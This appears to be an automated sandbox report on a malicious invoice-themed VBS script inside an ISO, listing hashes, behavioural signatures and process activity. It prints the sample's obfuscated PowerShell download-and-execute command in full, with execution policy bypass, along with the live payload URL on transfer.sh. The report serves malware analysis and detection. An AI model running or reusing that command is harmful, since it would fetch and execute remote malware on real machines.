Analysis
- max time kernel: 117s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 21-11-2024 22:31
Static task: static1
Behavioral task: behavioral1
- Sample: 976e459097d02ba60e08c872cd4e997b8ffde163a3bd7bb4abef17d455b62ed8.iso
- Resource: win7-20240708-en
Behavioral task: behavioral2
- Sample: 976e459097d02ba60e08c872cd4e997b8ffde163a3bd7bb4abef17d455b62ed8.iso
- Resource: win10v2004-20241007-en
Behavioral task: behavioral3
- Sample: Revised Invoice #03252022.vbs
- Resource: win7-20240903-en
Behavioral task: behavioral4
- Sample: Revised Invoice #03252022.vbs
- Resource: win10v2004-20241007-en
General
- Target: Revised Invoice #03252022.vbs
- Size: 636B
- MD5: e0e7f44f32d0b3dabb08bd61a3b81f6a
- SHA1: 3b5d3334936280cee7be949a7712669300502377
- SHA256: db00c50095732ed84821f321b813546431f298525fea8dbd1a4545c3abfa1fe1
- SHA512: 78baf7107944bc1cc371f058f73a2ecd1f601b3401d10774440cfcbcc767549bb43143c261422e7bd2e3f345a5ebb99acda70ca1a2033ccbcd08ef86edff8bf1
Malware Config
- Extracted: https://transfer.sh/get/9GqmOG/jramooooss.ps1
Signatures
- Blocklisted process makes network request (1 IoCs)
  flow | pid  | Process
  5    | 2140 | powershell.exe
  pid  | Process
  2140 | powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid  | Process
  2140 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description            | pid  | Process
  Token: SeDebugPrivilege | 2140 | powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                      | pid  | Process     | procid_target
  PID 2980 wrote to memory of 2140 | 2980 | WScript.exe | 30
  PID 2980 wrote to memory of 2140 | 2980 | WScript.exe | 30
  PID 2980 wrote to memory of 2140 | 2980 | WScript.exe | 30
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Revised Invoice #03252022.vbs"
   PID: 2980
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exeCutiO BYpASS -C I`eX(n`EW-Ob`J`EcT nET`.weBCLi`ENt).DoWnloAdStRiNG('https://transfer.sh/get/9GqmOG/jramooooss.ps1')
      PID: 2140
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken